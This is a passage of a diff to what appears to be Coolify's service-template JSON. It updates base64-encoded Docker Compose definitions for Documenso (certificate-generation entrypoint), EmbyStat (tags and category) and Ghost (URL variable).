ZBVEVfU01UUF9QQVNTV09SRD0ke05FWFRfUFJJVkFURV9TTVRQX1BBU1NXT1JEfScKICAgICAgLSAnTkVYVF9QUklWQVRFX1NNVFBfRlJPTV9OQU1FPSR7TkVYVF9QUklWQVRFX1NNVFBfRlJPTV9OQU1FfScKICAgICAgLSAnTkVYVF9QUklWQVRFX1NNVFBfRlJPTV9BRERSRVNTPSR7TkVYVF9QUklWQVRFX1NNVFBfRlJPTV9BRERSRVNTfScKICAgICAgLSAnTkVYVF9QUklWQVRFX0RBVEFCQVNFX1VSTD1wb3N0Z3Jlc3FsOi8vJHtTRVJWSUNFX1VTRVJfUE9TVEdSRVN9OiR7U0VSVklDRV9QQVNTV09SRF9QT1NUR1JFU31AZGF0YWJhc2UvJHtQT1NUR1JFU19EQjotZG9jdW1lbnNvLWRifT9zY2hlbWE9cHVibGljJwogICAgICAtICdORVhUX1BSSVZBVEVfRElSRUNUX0RBVEFCQVNFX1VSTD1wb3N0Z3Jlc3FsOi8vJHtTRVJWSUNFX1VTRVJfUE9TVEdSRVN9OiR7U0VSVklDRV9QQVNTV09SRF9QT1NUR1JFU31AZGF0YWJhc2UvJHtQT1NUR1JFU19EQjotZG9jdW1lbnNvLWRifT9zY2hlbWE9cHVibGljJwogICAgICAtIE5FWFRfUFJJVkFURV9TSUdOSU5HX0xPQ0FMX0ZJTEVfUEFUSD0vYXBwL2FwcHMvcmVtaXgvY2VydHMvY2VydGlmaWNhdGUucDEyCiAgICAgIC0gJ05FWFRfUFJJVkFURV9TSUdOSU5HX1BBU1NQSFJBU0U9JHtTRVJWSUNFX1BBU1NXT1JEX0RPQ1VNRU5TT30nCiAgICAgIC0gJ0NFUlRfVkFMSURfREFZUz0ke0NFUlRfVkFMSURfREFZUzotMzY1fScKICAgICAgLSAnQ0VSVF9JTkZPX0NPVU5UUllfTkFNRT0ke0NFUlRfSU5GT19DT1VOVFJZX05BTUU6LURPfScKICAgICAgLSAnQ0VSVF9JTkZPX1NUQVRFX09SX1BST1ZJREVOQ0U9JHtDRVJUX0lORk9fU1RBVEVfT1JfUFJPVklERU5DRTotU2FudGlhZ299JwogICAgICAtICdDRVJUX0lORk9fTE9DQUxJVFlfTkFNRT0ke0NFUlRfSU5GT19MT0NBTElUWV9OQU1FOi1TYW50aWFnb30nCiAgICAgIC0gJ0NFUlRfSU5GT19PUkdBTklaQVRJT05fTkFNRT0ke0NFUlRfSU5GT19PUkdBTklaQVRJT05fTkFNRTotRXhhbXBsZSBJTkN9JwogICAgICAtICdDRVJUX0lORk9fT1JHQU5JWkFUSU9OQUxfVU5JVD0ke0NFUlRfSU5GT19PUkdBTklaQVRJT05BTF9VTklUOi1JVCBEZXBhcnRtZW50fScKICAgICAgLSAnQ0VSVF9JTkZPX0VNQUlMPSR7Q0VSVF9JTkZPX0VNQUlMOi1leGFtcGxlQGdtYWlsLmNvbX0nCiAgICAgIC0gJ05FWFRfUFVCTElDX0RJU0FCTEVfU0lHTlVQPSR7RElTQUJMRV9MT0dJTjotZmFsc2V9JwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQtU0hFTEwKICAgICAgICAtICJ3Z2V0IC1xIC1PIC0gaHR0cDovL2RvY3VtZW5zbzozMDAwLyB8IGdyZXAgLXEgJ1NpZ24gaW4gdG8geW91ciBhY2NvdW50JyIKICAgICAgaW50ZXJ2YWw6IDJzCiAgICAgIHRpbWVvdXQ6IDEwcwogICAgICByZXRyaWVzOiAyMAogICAgZW50cnlwb2ludDoKICAgICAgLSAvYmluL3NoCiAgICAgIC0gJy1jJwogICAgICAtICJlY2hvIFwiLi9jZXJ0c1wiID4gL3RtcC9jZXJ0c19kaXJfcGF0aFxuZWNobyBcIi4vbWFrZS1jZXJ0cy5zaFwiID4gL3RtcC9jZXJ0X3NjcmlwdF9wYXRoXG5lY2hvIFwiJHtTRVJWSUNFX1BBU1NXT1JEX0RPQ1VNRU5TT31cIiA+IC90bXAvY2VydF9wYXNzXG5cbnRvdWNoIC90bXAvY2VydF9pbmZvX3BhdGhcbmNhdCA8PEVPRiA+IC90bXAvY2VydF9pbmZvX3BhdGhcblsgcmVxIF1cbmRpc3Rpbmd1aXNoZWRfbmFtZSA9IHJlcV9kaXN0aW5ndWlzaGVkX25hbWVcbnByb21wdCA9IG5vXG5bIHJlcV9kaXN0aW5ndWlzaGVkX25hbWUgXVxuQyAgICAgICAgICAgID0gJHtDRVJUX0lORk9fQ09VTlRSWV9OQU1FfVxuU1QgICAgICAgICAgID0gJHtDRVJUX0lORk9fU1RBVEVfT1JfUFJPVklERU5DRX1cbkwgICAgICAgICAgICA9ICR7Q0VSVF9JTkZPX0xPQ0FMSVRZX05BTUV9XG5PICAgICAgICAgICAgPSAke0NFUlRfSU5GT19PUkdBTklaQVRJT05fTkFNRX1cbk9VICAgICAgICAgICA9ICR7Q0VSVF9JTkZPX09SR0FOSVpBVElPTkFMX1VOSVR9XG5DTiAgICAgICAgICAgPSAke1NFUlZJQ0VfRlFETl9ET0NVTUVOU099XG5lbWFpbEFkZHJlc3MgPSAke0NFUlRfSU5GT19FTUFJTH1cbkVPRlxuXG5jYXQgPDxFT0YgPiBcIiQoY2F0IC90bXAvY2VydF9zY3JpcHRfcGF0aClcIlxubWtkaXIgLXAgXCIkKGNhdCAvdG1wL2NlcnRzX2Rpcl9wYXRoKVwiICYmIGNkIFwiJChjYXQgL3RtcC9jZXJ0c19kaXJfcGF0aClcIlxuXG5vcGVuc3NsIGdlbnJzYSAtb3V0IHByaXZhdGUua2V5IDIwNDhcblxub3BlbnNzbCByZXEgXFxcbiAgLW5ldyBcXFxuICAteDUwOSBcXFxuICAta2V5IHByaXZhdGUua2V5IFxcXG4gIC1vdXQgY2VydGlmaWNhdGUuY3J0IFxcXG4gIC1kYXlzICR7Q0VSVF9WQUxJRF9EQVlTfSBcXFxuICAtY29uZmlnIC90bXAvY2VydF9pbmZvX3BhdGhcblxub3BlbnNzbCBwa2NzMTIgXFxcbiAgLWV4cG9ydCBcXFxuICAtb3V0IGNlcnRpZmljYXRlLnAxMiBcXFxuICAtaW5rZXkgcHJpdmF0ZS5rZXkgXFxcbiAgLWluIGNlcnRpZmljYXRlLmNydCBcXFxuICAtbGVnYWN5IFxcXG4gIC1wYXNzd29yZCBmaWxlOi90bXAvY2VydF9wYXNzXG5FT0ZcbmNobW9kICt4IFwiJChjYXQgL3RtcC9jZXJ0X3NjcmlwdF9wYXRoKVwiXG5cbnNoIFwiJChjYXQgL3RtcC9jZXJ0X3NjcmlwdF9wYXRoKVwiXG5cbi4vc3RhcnQuc2hcbiIKICBkYXRhYmFzZToKICAgIGltYWdlOiAncG9zdGdyZXM6MTcnCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSAnUE9TVEdSRVNfVVNFUj0ke1NFUlZJQ0VfVVNFUl9QT1NUR1JFU30nCiAgICAgIC0gJ1BPU1RHUkVTX1BBU1NXT1JEPSR7U0VSVklDRV9QQVNTV09SRF9QT1NUR1JFU30nCiAgICAgIC0gJ1BPU1RHUkVTX0RCPSR7UE9TVEdSRVNfREI6LWRvY3VtZW5zby1kYn0nCiAgICB2b2x1bWVzOgogICAgICAtICdkb2N1bWVuc29fcG9zdGdyZXNxbF9kYXRhOi92YXIvbGliL3Bvc3RncmVzcWwvZGF0YScKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ELVNIRUxMCiAgICAgICAgLSAncGdfaXNyZWFkeSAtVSAkJHtQT1NUR1JFU19VU0VSfSAtZCAkJHtQT1NUR1JFU19EQn0nCiAgICAgIGludGVydmFsOiA1cwogICAgICB0aW1lb3V0OiAyMHMKICAgICAgcmV0cmllczogMTAK", + "compose": "c2VydmljZXM6CiAgZG9jdW1lbnNvOgogICAgaW1hZ2U6ICdkb2N1bWVuc28vZG9jdW1lbnNvOnYxLjEyLjEwJwogICAgZGVwZW5kc19vbjoKICAgICAgZGF0YWJhc2U6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgIGVudmlyb25tZW50OgogICAgICAtIFNFUlZJQ0VfRlFETl9ET0NVTUVOU09fMzAwMAogICAgICAtICdORVhUQVVUSF9VUkw9JHtTRVJWSUNFX0ZRRE5fRE9DVU1FTlNPfScKICAgICAgLSAnTkVYVEFVVEhfU0VDUkVUPSR7U0VSVklDRV9CQVNFNjRfQVVUSFNFQ1JFVH0nCiAgICAgIC0gJ05FWFRfUFJJVkFURV9FTkNSWVBUSU9OX0tFWT0ke1NFUlZJQ0VfQkFTRTY0X0VOQ1JZUFRJT05LRVl9JwogICAgICAtICdORVhUX1BSSVZBVEVfRU5DUllQVElPTl9TRUNPTkRBUllfS0VZPSR7U0VSVklDRV9CQVNFNjRfU0VDT05EQVJZRU5DUllQVElPTktFWX0nCiAgICAgIC0gJ05FWFRfUFVCTElDX1dFQkFQUF9VUkw9JHtTRVJWSUNFX0ZRRE5fRE9DVU1FTlNPfScKICAgICAgLSAnTkVYVF9QUklWQVRFX1JFU0VORF9BUElfS0VZPSR7TkVYVF9QUklWQVRFX1JFU0VORF9BUElfS0VZfScKICAgICAgLSAnTkVYVF9QUklWQVRFX1NNVFBfVFJBTlNQT1JUPSR7TkVYVF9QUklWQVRFX1NNVFBfVFJBTlNQT1JUfScKICAgICAgLSAnTkVYVF9QUklWQVRFX1NNVFBfSE9TVD0ke05FWFRfUFJJVkFURV9TTVRQX0hPU1R9JwogICAgICAtICdORVhUX1BSSVZBVEVfU01UUF9QT1JUPSR7TkVYVF9QUklWQVRFX1NNVFBfUE9SVH0nCiAgICAgIC0gJ05FWFRfUFJJVkFURV9TTVRQX1VTRVJOQU1FPSR7TkVYVF9QUklWQVRFX1NNVFBfVVNFUk5BTUV9JwogICAgICAtICdORVhUX1BSSVZBVEVfU01UUF9QQVNTV09SRD0ke05FWFRfUFJJVkFURV9TTVRQX1BBU1NXT1JEfScKICAgICAgLSAnTkVYVF9QUklWQVRFX1NNVFBfRlJPTV9OQU1FPSR7TkVYVF9QUklWQVRFX1NNVFBfRlJPTV9OQU1FfScKICAgICAgLSAnTkVYVF9QUklWQVRFX1NNVFBfRlJPTV9BRERSRVNTPSR7TkVYVF9QUklWQVRFX1NNVFBfRlJPTV9BRERSRVNTfScKICAgICAgLSAnTkVYVF9QUklWQVRFX0RBVEFCQVNFX1VSTD1wb3N0Z3Jlc3FsOi8vJHtTRVJWSUNFX1VTRVJfUE9TVEdSRVN9OiR7U0VSVklDRV9QQVNTV09SRF9QT1NUR1JFU31AZGF0YWJhc2UvJHtQT1NUR1JFU19EQjotZG9jdW1lbnNvLWRifT9zY2hlbWE9cHVibGljJwogICAgICAtICdORVhUX1BSSVZBVEVfRElSRUNUX0RBVEFCQVNFX1VSTD1wb3N0Z3Jlc3FsOi8vJHtTRVJWSUNFX1VTRVJfUE9TVEdSRVN9OiR7U0VSVklDRV9QQVNTV09SRF9QT1NUR1JFU31AZGF0YWJhc2UvJHtQT1NUR1JFU19EQjotZG9jdW1lbnNvLWRifT9zY2hlbWE9cHVibGljJwogICAgICAtIE5FWFRfUFJJVkFURV9TSUdOSU5HX0xPQ0FMX0ZJTEVfUEFUSD0vYXBwL2FwcHMvcmVtaXgvY2VydHMvY2VydGlmaWNhdGUucDEyCiAgICAgIC0gJ05FWFRfUFJJVkFURV9TSUdOSU5HX1BBU1NQSFJBU0U9JHtTRVJWSUNFX1BBU1NXT1JEX0RPQ1VNRU5TT30nCiAgICAgIC0gTkVYVF9QUklWQVRFX1NJR05JTkdfVFJBTlNQT1JUPWxvY2FsCiAgICAgIC0gTkVYVF9QUklWQVRFX1NJR05JTkdfTE9DQUxfRklMRV9QQVRIPS9hcHAvY2VydHMvY2VydC5wMTIKICAgICAgLSAnTkVYVF9QUklWQVRFX1NJR05JTkdfTE9DQUxfRklMRV9QQVNTUEhSQVNFPSR7U0VSVklDRV9QQVNTV09SRF9ET0NVTUVOU099JwogICAgICAtICdDRVJUX1ZBTElEX0RBWVM9JHtDRVJUX1ZBTElEX0RBWVM6LTM2NX0nCiAgICAgIC0gJ0NFUlRfSU5GT19DT1VOVFJZX05BTUU9JHtDRVJUX0lORk9fQ09VTlRSWV9OQU1FOi1ET30nCiAgICAgIC0gJ0NFUlRfSU5GT19TVEFURV9PUl9QUk9WSURFTkNFPSR7Q0VSVF9JTkZPX1NUQVRFX09SX1BST1ZJREVOQ0U6LVNhbnRpYWdvfScKICAgICAgLSAnQ0VSVF9JTkZPX0xPQ0FMSVRZX05BTUU9JHtDRVJUX0lORk9fTE9DQUxJVFlfTkFNRTotU2FudGlhZ299JwogICAgICAtICdDRVJUX0lORk9fT1JHQU5JWkFUSU9OX05BTUU9JHtDRVJUX0lORk9fT1JHQU5JWkFUSU9OX05BTUU6LUV4YW1wbGUgSU5DfScKICAgICAgLSAnQ0VSVF9JTkZPX09SR0FOSVpBVElPTkFMX1VOSVQ9JHtDRVJUX0lORk9fT1JHQU5JWkFUSU9OQUxfVU5JVDotSVQgRGVwYXJ0bWVudH0nCiAgICAgIC0gJ0NFUlRfSU5GT19FTUFJTD0ke0NFUlRfSU5GT19FTUFJTDotZXhhbXBsZUBnbWFpbC5jb219JwogICAgICAtICdORVhUX1BVQkxJQ19ESVNBQkxFX1NJR05VUD0ke0RJU0FCTEVfTE9HSU46LWZhbHNlfScKICAgICAgLSAnU0VSVklDRV9QQVNTV09SRF9ET0NVTUVOU089JHtTRVJWSUNFX1BBU1NXT1JEX0RPQ1VNRU5TTzotfScKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ELVNIRUxMCiAgICAgICAgLSAid2dldCAtcSAtTyAtIGh0dHA6Ly9kb2N1bWVuc286MzAwMC8gfCBncmVwIC1xICdTaWduIGluIHRvIHlvdXIgYWNjb3VudCciCiAgICAgIGludGVydmFsOiAycwogICAgICB0aW1lb3V0OiAxMHMKICAgICAgcmV0cmllczogMjAKICAgIGVudHJ5cG9pbnQ6CiAgICAgIC0gL2Jpbi9zaAogICAgICAtICctYycKICAgICAgLSAiQ0VSVF9QQVNTUEhSQVNFPVwiJCR7TkVYVF9QUklWQVRFX1NJR05JTkdfTE9DQUxfRklMRV9QQVNTUEhSQVNFfVwiXG5QQVNTUEhSQVNFX0ZJTEU9XCIvdG1wL2NlcnRfcGFzc3BocmFzZVwiXG5cbiMgU2F2ZSBvcmlnaW5hbCB3b3JraW5nIGRpcmVjdG9yeVxuT1JJR0lOQUxfRElSPVwiJCQocHdkKVwiXG5cbiMgRmluZCBvcGVuc3NsIGJpbmFyeSAoc2hvdWxkIGJlIGF2YWlsYWJsZSBpbiB2MS4xMi4xMCspXG5PUEVOU1NMX0NNRD1cIiQkKHdoaWNoIG9wZW5zc2wgMj4vZGV2L251bGwgfHwgY29tbWFuZCAtdiBvcGVuc3NsIDI+L2Rldi9udWxsIHx8IGVjaG8gJy91c3IvYmluL29wZW5zc2wnKVwiXG5cbiMgVmVyaWZ5IG9wZW5zc2wgaXMgYXZhaWxhYmxlXG5pZiAhICQkT1BFTlNTTF9DTUQgdmVyc2lvbiA+L2Rldi9udWxsIDI+JjE7IHRoZW5cbiAgZWNobyBcIkVycm9yOiBPcGVuU1NMIG5vdCBmb3VuZC4gUGxlYXNlIHVzZSBEb2N1bWVuc28gaW1hZ2UgdjEuMTIuMTAgb3IgbGF0ZXIuXCJcbiAgZXhpdCAxXG5maVxuXG4jIENyZWF0ZSBjZXJ0aWZpY2F0ZSBkaXJlY3RvcnkgLSB1c2UgL2FwcC9jZXJ0cyAod3JpdGFibGUgYnkgdXNlciAxMDAxKVxuQ0VSVF9ESVI9XCIvYXBwL2NlcnRzXCJcbm1rZGlyIC1wIFwiJCRDRVJUX0RJUlwiIHx8IHtcbiAgIyBGYWxsYmFjayB0byB0bXAgaWYgYXBwIGRpcmVjdG9yeSBub3Qgd3JpdGFibGVcbiAgQ0VSVF9ESVI9XCIvdG1wL2NlcnRzXCJcbiAgbWtkaXIgLXAgXCIkJENFUlRfRElSXCJcbiAgZWNobyBcIldhcm5pbmc6IFVzaW5nIGZhbGxiYWNrIGRpcmVjdG9yeTogJCRDRVJUX0RJUlwiXG59XG5cbiMgQ3JlYXRlIHBhc3NwaHJhc2UgZmlsZSBmb3Igc2VjdXJlIGhhbmRsaW5nIChwcmV2ZW50cyBleHBvc3VyZSBpbiBwcm9jZXNzIGxpc3QpXG4jIFRoaXMgYXZvaWRzIHNoZWxsIHdvcmQtc3BsaXR0aW5nIGlzc3VlcyBhbmQgcHJldmVudHMgcGFzc3BocmFzZSBmcm9tIGFwcGVhcmluZyBpbiBwcy9wcm9jZXNzIGxpc3RcbmVjaG8gLW4gXCIkJENFUlRfUEFTU1BIUkFTRVwiID4gXCIkJFBBU1NQSFJBU0VfRklMRVwiXG5jaG1vZCA2MDAgXCIkJFBBU1NQSFJBU0VfRklMRVwiXG5cbnRvdWNoIC90bXAvY2VydF9pbmZvX3BhdGhcbmNhdCA8PEVPRiA+IC90bXAvY2VydF9pbmZvX3BhdGhcblsgcmVxIF1cbmRpc3Rpbmd1aXNoZWRfbmFtZSA9IHJlcV9kaXN0aW5ndWlzaGVkX25hbWVcbnByb21wdCA9IG5vXG5bIHJlcV9kaXN0aW5ndWlzaGVkX25hbWUgXVxuQyAgICAgICAgICAgID0gJHtDRVJUX0lORk9fQ09VTlRSWV9OQU1FfVxuU1QgICAgICAgICAgID0gJHtDRVJUX0lORk9fU1RBVEVfT1JfUFJPVklERU5DRX1cbkwgICAgICAgICAgICA9ICR7Q0VSVF9JTkZPX0xPQ0FMSVRZX05BTUV9XG5PICAgICAgICAgICAgPSAke0NFUlRfSU5GT19PUkdBTklaQVRJT05fTkFNRX1cbk9VICAgICAgICAgICA9ICR7Q0VSVF9JTkZPX09SR0FOSVpBVElPTkFMX1VOSVR9XG5DTiAgICAgICAgICAgPSAke1NFUlZJQ0VfRlFETl9ET0NVTUVOU099XG5lbWFpbEFkZHJlc3MgPSAke0NFUlRfSU5GT19FTUFJTH1cbkVPRlxuXG5jZCBcIiQkQ0VSVF9ESVJcIlxuXG4kJE9QRU5TU0xfQ01EIGdlbnJzYSAtb3V0IHByaXZhdGUua2V5IDIwNDhcblxuJCRPUEVOU1NMX0NNRCByZXEgXFxcbiAgLW5ldyBcXFxuICAteDUwOSBcXFxuICAta2V5IHByaXZhdGUua2V5IFxcXG4gIC1vdXQgY2VydGlmaWNhdGUuY3J0IFxcXG4gIC1kYXlzICQke0NFUlRfVkFMSURfREFZU30gXFxcbiAgLWNvbmZpZyAvdG1wL2NlcnRfaW5mb19wYXRoXG5cbiMgQ3JlYXRlIFAxMiBjZXJ0aWZpY2F0ZSB1c2luZyBmaWxlLWJhc2VkIHBhc3NwaHJhc2UgKHByZXZlbnRzIGV4cG9zdXJlIGluIHByb2Nlc3MgbGlzdClcbiMgUHJpdmF0ZSBrZXkgaXMgbm90IGVuY3J5cHRlZCwgc28gd2Ugb25seSBuZWVkIC1wYXNzb3V0IChub3QgLXBhc3NpbilcbiQkT1BFTlNTTF9DTUQgcGtjczEyIFxcXG4gIC1leHBvcnQgXFxcbiAgLW91dCBjZXJ0LnAxMiBcXFxuICAtaW5rZXkgcHJpdmF0ZS5rZXkgXFxcbiAgLWluIGNlcnRpZmljYXRlLmNydCBcXFxuICAtbGVnYWN5IFxcXG4gIC1wYXNzb3V0IGZpbGU6XCIkJFBBU1NQSFJBU0VfRklMRVwiXG5cbiMgQ2xlYW4gdXAgcGFzc3BocmFzZSBmaWxlIGltbWVkaWF0ZWx5IGFmdGVyIHVzZVxucm0gLWYgXCIkJFBBU1NQSFJBU0VfRklMRVwiXG5cbiMgU2V0IHBlcm1pc3Npb25zIChtYXkgZmFpbCBpZiBub3Qgcm9vdCwgYnV0IHdpbGwgd29yayBpbiBDb29saWZ5KVxuY2hvd24gMTAwMToxMDAxIGNlcnQucDEyIHByaXZhdGUua2V5IGNlcnRpZmljYXRlLmNydCAyPi9kZXYvbnVsbCB8fCB0cnVlXG5jaG1vZCA0MDAgY2VydC5wMTIgcHJpdmF0ZS5rZXkgY2VydGlmaWNhdGUuY3J0XG5cbiMgVXBkYXRlIGVudmlyb25tZW50IHZhcmlhYmxlIGlmIGRpcmVjdG9yeSBjaGFuZ2VkXG5pZiBbIFwiJCRDRVJUX0RJUlwiICE9IFwiL2FwcC9jZXJ0c1wiIF07IHRoZW5cbiAgZXhwb3J0IE5FWFRfUFJJVkFURV9TSUdOSU5HX0xPQ0FMX0ZJTEVfUEFUSD1cIiQkQ0VSVF9ESVIvY2VydC5wMTJcIlxuZmlcblxuIyBSZXR1cm4gdG8gb3JpZ2luYWwgZGlyZWN0b3J5IGJlZm9yZSBzdGFydGluZyBhcHBsaWNhdGlvblxuY2QgXCIkJE9SSUdJTkFMX0RJUlwiXG5cbi4vc3RhcnQuc2hcbiIKICBkYXRhYmFzZToKICAgIGltYWdlOiAncG9zdGdyZXM6MTcnCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSAnUE9TVEdSRVNfVVNFUj0ke1NFUlZJQ0VfVVNFUl9QT1NUR1JFU30nCiAgICAgIC0gJ1BPU1RHUkVTX1BBU1NXT1JEPSR7U0VSVklDRV9QQVNTV09SRF9QT1NUR1JFU30nCiAgICAgIC0gJ1BPU1RHUkVTX0RCPSR7UE9TVEdSRVNfREI6LWRvY3VtZW5zby1kYn0nCiAgICB2b2x1bWVzOgogICAgICAtICdkb2N1bWVuc29fcG9zdGdyZXNxbF9kYXRhOi92YXIvbGliL3Bvc3RncmVzcWwvZGF0YScKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ELVNIRUxMCiAgICAgICAgLSAncGdfaXNyZWFkeSAtVSAkJHtQT1NUR1JFU19VU0VSfSAtZCAkJHtQT1NUR1JFU19EQn0nCiAgICAgIGludGVydmFsOiA1cwogICAgICB0aW1lb3V0OiAyMHMKICAgICAgcmV0cmllczogMTAK", "tags": [ "signing", "opensource", @@ -976,13 +976,13 @@ "slogan": "EmbyStat is a web analytics tool, designed to provide insight into website traffic and user behavior.", "compose": "c2VydmljZXM6CiAgZW1ieXN0YXQ6CiAgICBpbWFnZTogJ2xzY3IuaW8vbGludXhzZXJ2ZXIvZW1ieXN0YXQ6bGF0ZXN0JwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gU0VSVklDRV9GUUROX0VNQllTVEFUXzY1NTUKICAgICAgLSBQVUlEPTEwMDAKICAgICAgLSBQR0lEPTEwMDAKICAgICAgLSBUWj1FdXJvcGUvTWFkcmlkCiAgICB2b2x1bWVzOgogICAgICAtICdlbWJ5c3RhdC1jb25maWc6L2NvbmZpZycKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ECiAgICAgICAgLSBjdXJsCiAgICAgICAgLSAnLWYnCiAgICAgICAgLSAnaHR0cDovLzEyNy4wLjAuMTo2NTU1JwogICAgICBpbnRlcnZhbDogMnMKICAgICAgdGltZW91dDogMTBzCiAgICAgIHJldHJpZXM6IDE1Cg==", "tags": [ - "media", - "server", - "movies", - "tv", - "music" + "analytics", + "insights", + "statistics", + "web", + "traffic" ], - "category": "media", + "category": "analytics", "logo": "svgs/default.webp", "minversion": "0.0.0", "port": "6555" @@ -1397,7 +1397,7 @@ "ghost": { "documentation": "https://ghost.org?utm_source=coolify.io", "slogan": "Ghost is a content management system (CMS) and blogging platform.", - "compose": "c2VydmljZXM6CiAgZ2hvc3Q6CiAgICBpbWFnZTogJ2dob3N0OjUnCiAgICB2b2x1bWVzOgogICAgICAtICdnaG9zdC1jb250ZW50LWRhdGE6L3Zhci9saWIvZ2hvc3QvY29udGVudCcKICAgIGVudmlyb25tZW50OgogICAgICAtIFNFUlZJQ0VfRlFETl9HSE9TVF8yMzY4CiAgICAgIC0gdXJsPSRTRVJWSUNFX0ZRRE5fR0hPU1RfMjM2OAogICAgICAtIGRhdGFiYXNlX19jbGllbnQ9bXlzcWwKICAgICAgLSBkYXRhYmFzZV9fY29ubmVjdGlvbl9faG9zdD1teXNxbAogICAgICAtIGRhdGFiYXNlX19jb25uZWN0aW9uX191c2VyPSRTRVJWSUNFX1VTRVJfTVlTUUwKICAgICAgLSBkYXRhYmFzZV9fY29ubmVjdGlvbl9fcGFzc3dvcmQ9JFNFUlZJQ0VfUEFTU1dPUkRfTVlTUUwKICAgICAgLSAnZGF0YWJhc2VfX2Nvbm5lY3Rpb25fX2RhdGFiYXNlPSR7TVlTUUxfREFUQUJBU0UtZ2hvc3R9JwogICAgICAtIG1haWxfX3RyYW5zcG9ydD1TTVRQCiAgICAgIC0gJ21haWxfX29wdGlvbnNfX2F1dGhfX3Bhc3M9JHtNQUlMX09QVElPTlNfQVVUSF9QQVNTfScKICAgICAgLSAnbWFpbF9fb3B0aW9uc19fYXV0aF9fdXNlcj0ke01BSUxfT1BUSU9OU19BVVRIX1VTRVJ9JwogICAgICAtICdtYWlsX19vcHRpb25zX19zZWN1cmU9JHtNQUlMX09QVElPTlNfU0VDVVJFOi10cnVlfScKICAgICAgLSAnbWFpbF9fb3B0aW9uc19fcG9ydD0ke01BSUxfT1BUSU9OU19QT1JUOi00NjV9JwogICAgICAtICdtYWlsX19vcHRpb25zX19zZXJ2aWNlPSR7TUFJTF9PUFRJT05TX1NFUlZJQ0U6LU1haWxndW59JwogICAgICAtICdtYWlsX19vcHRpb25zX19ob3N0PSR7TUFJTF9PUFRJT05TX0hPU1R9JwogICAgZGVwZW5kc19vbjoKICAgICAgbXlzcWw6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ECiAgICAgICAgLSBlY2hvCiAgICAgICAgLSBvawogICAgICBpbnRlcnZhbDogNXMKICAgICAgdGltZW91dDogMjBzCiAgICAgIHJldHJpZXM6IDEwCiAgbXlzcWw6CiAgICBpbWFnZTogJ215c3FsOjguMCcKICAgIHZvbHVtZXM6CiAgICAgIC0gJ2dob3N0LW15c3FsLWRhdGE6L3Zhci9saWIvbXlzcWwnCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSAnTVlTUUxfVVNFUj0ke1NFUlZJQ0VfVVNFUl9NWVNRTH0nCiAgICAgIC0gJ01ZU1FMX1BBU1NXT1JEPSR7U0VSVklDRV9QQVNTV09SRF9NWVNRTH0nCiAgICAgIC0gJ01ZU1FMX0RBVEFCQVNFPSR7TVlTUUxfREFUQUJBU0V9JwogICAgICAtICdNWVNRTF9ST09UX1BBU1NXT1JEPSR7U0VSVklDRV9QQVNTV09SRF9NWVNRTFJPT1R9JwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQKICAgICAgICAtIG15c3FsYWRtaW4KICAgICAgICAtIHBpbmcKICAgICAgICAtICctaCcKICAgICAgICAtIDEyNy4wLjAuMQogICAgICBpbnRlcnZhbDogNXMKICAgICAgdGltZW91dDogMjBzCiAgICAgIHJldHJpZXM6IDEwCg==", + "compose": "c2VydmljZXM6CiAgZ2hvc3Q6CiAgICBpbWFnZTogJ2dob3N0OjUnCiAgICB2b2x1bWVzOgogICAgICAtICdnaG9zdC1jb250ZW50LWRhdGE6L3Zhci9saWIvZ2hvc3QvY29udGVudCcKICAgIGVudmlyb25tZW50OgogICAgICAtIFNFUlZJQ0VfRlFETl9HSE9TVF8yMzY4CiAgICAgIC0gdXJsPSRTRVJWSUNFX0ZRRE5fR0hPU1QKICAgICAgLSBkYXRhYmFzZV9fY2xpZW50PW15c3FsCiAgICAgIC0gZGF0YWJhc2VfX2Nvbm5lY3Rpb25fX2hvc3Q9bXlzcWwKICAgICAgLSBkYXRhYmFzZV9fY29ubmVjdGlvbl9fdXNlcj0kU0VSVklDRV9VU0VSX01ZU1FMCiAgICAgIC0gZGF0YWJhc2VfX2Nvbm5lY3Rpb25fX3Bhc3N3b3JkPSRTRVJWSUNFX1BBU1NXT1JEX01ZU1FMCiAgICAgIC0gJ2RhdGFiYXNlX19jb25uZWN0aW9uX19kYXRhYmFzZT0ke01ZU1FMX0RBVEFCQVNFLWdob3N0fScKICAgICAgLSBtYWlsX190cmFuc3BvcnQ9U01UUAogICAgICAtICdtYWlsX19vcHRpb25zX19hdXRoX19wYXNzPSR7TUFJTF9PUFRJT05TX0FVVEhfUEFTU30nCiAgICAgIC0gJ21haWxfX29wdGlvbnNfX2F1dGhfX3VzZXI9JHtNQUlMX09QVElPTlNfQVVUSF9VU0VSfScKICAgICAgLSAnbWFpbF9fb3B0aW9uc19fc2VjdXJlPSR7TUFJTF9PUFRJT05TX1NFQ1VSRTotdHJ1ZX0nCiAgICAgIC0gJ21haWxfX29wdGlvbnNfX3BvcnQ9JHtNQUlMX09QVElPTlNfUE9SVDotNDY1fScKICAgICAgLSAnbWFpbF9fb3B0aW9uc19fc2VydmljZT0ke01BSUxfT1BUSU9OU19TRVJWSUNFOi1NYWlsZ3VufScKICAgICAgLSAnbWFpbF9fb3B0aW9uc19faG9zdD0ke01BSUxfT1BUSU9OU19IT1NUfScKICAgIGRlcGVuZHNfb246CiAgICAgIG15c3FsOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRAogICAgICAgIC0gZWNobwogICAgICAgIC0gb2sKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDIwcwogICAgICByZXRyaWVzOiAxMAogIG15c3FsOgogICAgaW1hZ2U6ICdteXNxbDo4LjAnC